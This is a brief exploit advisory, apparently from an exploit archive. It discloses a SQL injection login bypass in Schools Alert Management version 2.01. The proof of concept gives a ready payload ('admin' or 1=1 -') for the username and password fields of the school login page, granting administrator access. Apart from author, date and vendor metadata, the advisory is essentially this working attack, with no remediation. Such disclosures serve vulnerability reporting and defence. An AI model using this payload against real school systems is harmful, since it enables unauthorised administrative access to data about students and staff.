-->

Exploit: Schools Alert Management - SQL injection login bypass

SQL injection login bypass
Schools Alert Management.
Schools Alert Management - SQL injection login bypass, an attacker is able to inject malicious sql query to bypass the login page and login as admin of the particular school.

Proof of Concept: http://localhost/schoolalert/demo_school_name/schools_login.php  [ set username and password ] to >>  admin' or 1=1 - you must choose the check box as management

Exploit Author: Ali BawazeEer
Dork: N/A
Date: 28.08.2017
Vendor Homepage: http://www.phpscriptsmall.com/product/schools-alert-management-system/
Version: 2.01
Category: Webapps
Tested on: Win / Mozila Firefox